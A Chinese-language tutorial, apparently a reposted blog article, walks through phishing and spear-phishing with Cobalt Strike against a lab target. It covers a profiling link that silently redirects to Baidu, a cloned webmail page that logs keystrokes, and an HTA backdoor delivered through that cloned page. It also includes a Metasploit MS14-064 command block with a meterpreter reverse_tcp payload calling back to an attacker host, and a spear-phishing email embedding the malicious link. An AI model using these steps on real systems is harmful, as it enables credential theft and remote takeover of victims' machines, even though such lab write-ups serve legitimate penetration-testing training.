154.网络安全渗透测试—[Cobalt Strike系列]—[钓鱼攻击/鱼叉钓鱼]

这篇具有很好参考价值的文章主要介绍了154.网络安全渗透测试—[Cobalt Strike系列]—[钓鱼攻击/鱼叉钓鱼]。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

我认为,无论是学习安全还是从事安全的人多多少少都有些许的情怀和使命感!!!

一、钓鱼攻击和鱼叉钓鱼简介

1、钓鱼攻击简介

    网络钓鱼是指诱导人们连接那些黑客已经锁定的目标。这种攻击方法的成功率很高,也非常常见。点击链接、打开表格或者连接其他一些文件都会感染病毒。一次简单的点击相当于为攻击者开启了一扇电子门,这样他就可以接触到你的内部弱点了。因为你已经同意他进入,他能够接触弱点,然后挖掘信息和授权连接。

2、钓鱼攻击模块:6个

(1)Manage(web服务管理): 对开启的web服务进行管理;

(2)Clone Site(克隆网站) : 可以记录受害者提交的数据;

(3)Host File(文件下载):提供一个本地文件下载;

(4)Scripted Web Delivery(脚本web传递): 基于Web的攻击测试脚本,自动生成可执行的payload ,通常用这个模块来生成powershell命令反弹shell;

(5)Signed Applet Attack(签名Applet攻击):启动一个Web服务以提供自签名Java Applet的运行环境;

(6)Smart Applet Attack(智能攻击) 自动检测Java版本并利用已知的exploits绕过security;

(7)System Profiler(信息搜集):用来获取一些系统信息,比如系统版本,Flash版本,浏览器版本等。

//如下图所示:
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

3、鱼叉钓鱼简介

(1)鱼叉式网络钓鱼(Spear phishing)指一种源于亚洲与东欧只针对特定目标进行攻击的网络钓鱼攻击。

(2)由于鱼叉式网络钓鱼锁定之对象并非一般个人,而是特定公司、组织之成员,故受窃之资讯已非一般网络钓鱼所窃取之个人资料,而是其他高度敏感性资料,如知识产权及商业机密。

4、鱼叉钓鱼示例:邮件钓鱼

//如下图所示:点击攻击下的邮件钓鱼进行鱼叉式钓鱼
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

二、钓鱼攻击测试

1、测试环境

cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

2、System Profiler(信息搜集)

(1)CS生成信息收集的钓鱼链接:点击攻击-->点击钓鱼攻击-->点击信息收集-->填写钓鱼的URL-->填写team server地址-->填写web端口-->填写重定向的地址(该重定向只是为了让受害者以为真的只是访问百度)
//如下图所示:调出信息收集模块
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载
//如下图所示:在team server服务器上开启了一个80服务,该服务的地址是http://cs.clqwsn.xyz/baidu,该地址是钓鱼链接可以反弹系统信息给cs,还会自动的重定向到百度
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载
//如下图所示:生成钓鱼链接http://cs.clqwsn.xyz:80/baiducs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

(2)cs上查看是否真的生成了钓鱼链接的服务:点击攻击-->点击钓鱼攻击-->点击web服务管理即可看到刚刚生成的服务
//如下图所示:
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

(3)当靶机访问http://cs.clqwsn.xyz:80/baidu该链接,cs就会收集到靶机信息,而且靶机也会很快的跳到百度,一般很难被发现。
//如下图所示:靶机访问钓鱼链接后,紧接着发送信息给了cs,然后自己重定向到了百度
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

(4)cs上查看靶机的信息:点击视图-->点击应用信息-->查看收集到的靶机信息
//如下图所示:
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

3、Clone Site(克隆网站):获取键盘记录

(1)CS生成克隆网站的钓鱼链接:点击攻击-->点击钓鱼攻击-->点击克隆网站-->填写要克隆的网站-->填写本地team server的URI-->填写本地team server的地址-->选择80端口-->勾选开启键盘记录
//如下图所示:
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

//如下图所示:在team server上开启了一个80服务,该地址是http://cs.clqwsn.xyz/mail,该地址的网站是根据mail.tom.com克隆而来的,受害者点击访问该80的地址的时候可以记录受害者的键盘记录
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

//如下图所示:生成钓鱼链接http://cs.clqwsn.xyz:80/mail
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

(2)cs上检查是否开启了80服务
//如下图所示:成功开启了克隆网站
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

(3)靶机浏览器访问钓鱼链接,并填写账号信息
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

(4)CS上查看靶机的键盘记录:点击视图-->点击web日志-->查看到键盘记录
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

4、生成hta后门文件+文件下载(cs上传hta)+Clone Site(克隆网站):钓鱼攻击获取cs会话

(1)首先我们要生成一个hta后门文件到本地:新建监听器-->创建hta后门
//如下图所示:9527监听器
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载
//如下图所示:hta后门绑定9527监听器
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

(2)其次我们要把这个hta后门文件通过文件下载模块,上传到靶机的80服务上:点击攻击-->点击钓鱼攻击-->点击文件下载-->上传hta后门文件
//如下图所示:调出文件下载模块
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

//如下图所示:把本地的hta后门上传到team server的80服务的update.hta
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载
(3)cs上检查是否开启了80服务
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

(4)克隆网站的时候,Attack填写为hta的下载地址,然后靶机访问钓鱼链接的时候不仅仅只是访问了一个克隆网站的样子,还会下载到该hta后门(这个文件下载,是对受害者来说的;如果对cs来说其实是上传文件到自己的web服务器上,然后在供给受害者下载。)

cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载
(5)靶机访问钓鱼链接:不仅会显示克隆的网站,还会提示下载hta后门,只要运行了下载的后门文件,就会反弹会话到cs
//如下图所示:
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载
(6)cs上查看上线的靶机:
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

5、MSF溢出代码+CS克隆网站:钓鱼攻击获取MSF会话

(1)MSF生成反弹会话的链接:http://47.x.x.x:9999/21HPgNXV7Ub6zz

use exploit/windows/browser/ms14_064_ole_code_execution
set srvhost [msf恶意链接的ip]
set SRVPORT [msf恶意链接的端口]
set payload windows/meterpreter/reverse_tcp
set lhost [msf的ip]
Set lport [msf监听的端口]
exploit

cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

(2)CS克隆网站的时候,其中的Attack填写MSF的链接,此时生成的钓鱼链接http://cs.clqwsn.xyz:80/2不仅仅是克隆的百度网站的样子,还可以反弹会话给MSF
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

(3)当受害人访问http://cs.clqwsn.xyz/2的时候, 就会加载http://47.x.x.x:9999/21HPgNXV7Ub6zz进行溢出攻击,从而反弹会话给MSF
//由于,该溢出攻击对靶机无效,所以图略

三、鱼叉钓鱼测试

1、邮件钓鱼

(1)自己的163邮箱开启POP3/SMTP代发功能:这个授权码是代理邮箱登录时候的密码
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

(2)设置目标qq邮箱:目标邮箱和名称之间必须是一个Tab键,虽然四个空格也可以解析,但是会报错
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

(3)从gmail谷歌邮箱收集邮件模板:点击显示原始邮件,另存为本地template.txt
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

(4)CS进入邮件钓鱼模块:点击攻击-->邮件钓鱼
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

(5)分析邮件钓鱼的各个模块
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

Targets:存有目标邮箱及收件人信息的文本文件
Template:邮件模板文件
Attachment:附件(这里没有用到)
Embed URL:填写url钓鱼链接, 可将邮件的内置链接替换掉。此处我填写了带有hta木马下载功能的克隆网站,也就是第三个实验中的钓鱼链接http://cs/clqwsn.xyz/1
Mail Server: 邮箱服务器相关信息,该服务器信息是代发邮件的服务器,这里使用的是163的邮箱
Bounce to:邮箱地址

(6)发送钓鱼邮件:这里我们让163邮箱代发邮件给qq邮箱,其中内嵌了第三个实验的钓鱼链接http://cs.clqwsn.xyz/r1,这个链接不仅可以看到克隆的百度网站,同时还会下载hta后门
//如下图所示:具体的配置
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载
//如下图所示:上面图中设置代发邮件的163邮箱
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

(7)在点击发送之后,会显示如下视图,则163邮箱(代理邮箱服务器)会自动的给qq邮箱(受害者)发送一个内嵌了恶意链接的邮件
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

(8)登录受害者邮件,发现收到了新的邮件
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

(9)受害者打开邮件,并点击恶意链接,则会跳转http://cs.clqwsn.xyz/r1下载hta后门
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载

(10)假如受害者执行了后门文件,cs会上线受害者主机
cs键盘记录,# 1.网络安全渗透测试-[持续更新],cobalt 钓鱼供给,cobalt 鱼叉钓鱼,cobalt 邮件钓鱼,cobalt 克隆网站键盘记录,cobalt 克隆网站文件下载文章来源地址https://www.toymoban.com/news/detail-670642.html

到了这里,关于154.网络安全渗透测试—[Cobalt Strike系列]—[钓鱼攻击/鱼叉钓鱼]的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【渗透测试】Cobalt Strike制作钓鱼邮件渗透Windows

    在kali中使用Cobalt Strike制作钓鱼邮件,对Windows进行渗透 kali(服务端):192.168.175.129 win11(攻击机):192.168.175.128 win11(靶机):192.168.175.137 将压缩包解压 若要解压到指定路径,先新建文件夹,使用以下命令 进入解压后的Server文件夹,赋予文件执行权限 192.168.175.129为Kali机器

    2024年02月16日
    浏览(52)
  • 内网安全:Cobalt Strike 工具 渗透多层内网主机.(正向 || 反向)

    Cobalt Strike 是一款以 metasploit 为基础的 GUI 的框架式渗透工具,又被业界人称为 CS。拥有多种协议主机上线方式,集成了端口转发,服务扫描,自动化溢出,多模式端口监听,winexe 木马生成,win dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑;钓鱼攻击包括:站点克

    2024年02月11日
    浏览(45)
  • 网络安全渗透测试实验一

    理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。 系统环境:Kali Linux 2、Windows 网络环境:交换网络结构 实验工具: Metasploitable2(需自行下载虚拟机镜像);Nmap(Kali);

    2023年04月26日
    浏览(51)
  • 【网络安全】渗透测试之木马免杀

    博主昵称:跳楼梯企鹅 博主主页面链接: 博主主页传送门 博主专栏页面连接:

    2024年02月02日
    浏览(48)
  • 智能网联汽车网络安全测试:渗透测试,模糊测试详细讲解

    车内网络系统架构 随着智能网联汽车电子系统的复杂化,电子电气架构( Electrical/Electronic Architecture, EEA )由分布式向集中式架构演进,如图 2.1 所示。 在汽车 EEA 演进的同时,为了满足不同复杂程度的汽车功能对于通信性能的需求,车内总线协议也在不断发展。CAN 总线协

    2024年01月23日
    浏览(43)
  • 网络安全渗透测试的八个步骤

    ​一、明确目标 ​1.确定范围:测试目标的范畴、ip、网站域名、内外网、检测帐户。 2.确定标准:能渗入到何种程度,所花费的时间、能不能改动提交、能不能漏洞利用、这些。 3.确定要求:web应用的漏洞、业务逻辑漏洞、工作人员管理权限管理漏洞、这些。 ​二、信息收

    2024年02月04日
    浏览(45)
  • 记一次网络安全渗透测试实战指南

    网址已无法访问,就不贴了 可以使用Fofa,火线,zoomeye,searchcode.com等爬取相关的资产,重点关注一些有漏洞暴露的框架和服务例如:泛微,PHP,Tomca,后台,weblogic等等。之后就主要分三步: 指纹识别、漏洞验证、漏洞复现。 指纹识别很好理解,我们要拿历史漏洞怼它,首

    2024年02月08日
    浏览(54)
  • 【网络安全】渗透测试工具——Burp Suite

    文章较长,看之前建议先了解以下四个问题 问题一、Burp Suite是什么? Burp Suite是一个集成化的渗透测试工具,它集合了多种渗透测试组件,使我们自动化地或手工地能更好的完成对web应用的渗透测试和攻击。 在渗透测试中,我们使用Burp Suite将使得测试工作变得更加快捷高效

    2024年02月16日
    浏览(50)
  • 2023年网络安全比赛--综合渗透测试(超详细)

    一、竞赛时间 180分钟 共计3小时 二、竞赛阶段 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 1.扫描目标靶机将靶机开放的所有端口,当作flag提交(例:21,22,23); 2.扫描目标靶机将靶机的http服务版本信息当作flag提交(例:apache 2.3.4); 3.靶机网站存在目录遍历漏洞,请将h

    2024年02月12日
    浏览(43)
  • 安全渗透测试网络基础知识之路由技术

    #1.静态路由技术 ##1.1路由技术种类: 静态路由技术、动态路由技术 ##1.2静态路由原理 静态路由是网络中一种手动配置的路由方式,用于指定数据包在网络中的传输路径。与动态路由协议不同,静态路由需要管理员手动配置路由表,指定目的网络和下一跳路由器的关联关系。

    2024年02月06日
    浏览(52)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包